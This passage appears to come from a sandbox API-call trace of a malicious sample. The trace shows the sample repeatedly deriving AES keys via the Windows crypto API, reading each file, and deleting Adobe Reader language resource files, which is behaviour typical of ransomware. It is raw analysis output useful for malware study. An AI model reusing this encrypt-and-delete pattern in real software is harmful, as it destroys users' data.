(x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt")) returned 1 [0221.356] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.356] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.356] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.357] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.357] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.357] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.450] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.450] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.450] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.452] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt")) returned 1 [0221.453] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.454] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.454] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.454] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.454] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.454] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.502] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.502] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.502] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.503] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt")) returned 1 [0221.505] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.505] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.505] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.505] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.505] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.505] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.510] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.510] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.510] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.511] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt")) returned 1 [0221.513] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.513] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.513] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.513] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.513] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.513] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.543] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.543] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.543] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.545] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt")) returned 1 [0221.546] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.547] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.547] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.547] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.547] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.547] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.551] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.551] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.551] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.552] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt")) returned 1 [0221.553] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.554] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.554] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.554] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.554] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.554] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.568] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.568] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.569] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.570] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt")) returned 1 [0221.585] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.585] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.585] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.586] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.586] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.586] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.610] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.610] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.610] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.612] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt")) returned 1 [0221.648] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.649] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.649] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.649] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.649] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.649] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.659] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.659] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.659] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.661] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt")) returned 1 [0221.662] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.663] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.663] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.663] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.663] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.663] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.677] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.677] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.677] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.679] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt")) returned 1 [0221.680] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.681] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.681] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.681] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.681] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.681] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.685] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.685] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.685] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.686] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt")) returned 1 [0221.687] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.688] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.688] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.688] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.688] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.688] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.701] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.701] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.701] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.703] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt")) returned 1 [0221.714] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.715] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.715] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.715] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.715] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.715] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.721] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.721] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.721] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.722] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt")) returned 1 [0221.723] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.724] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.724] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.724] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.724] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.724] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.728] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.728] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.728] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.729] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt")) returned 1 [0221.731] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.732] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.732] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.732] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.732] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6cde [0221.732] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.740] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.740] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.740] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.741] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt")) returned 1 [0221.742] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.743] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.743] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.743] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.743] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6cde [0221.743] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.747] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.747] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.747] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.748] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt")) returned 1 [0221.750] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.751] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.751] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.751] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.751] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6cdc [0221.751] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.755] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.755] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.755] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.756] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt")) returned 1 [0221.759] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.759] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.759] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.759] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.759] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6cdc [0221.759] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.773] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.773] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.773] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.774] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt")) returned 1 [0221.776] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.776] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.776] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.776] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.776] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6cdc [0221.776] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.780] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.780] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.780] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.781] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt")) returned 1 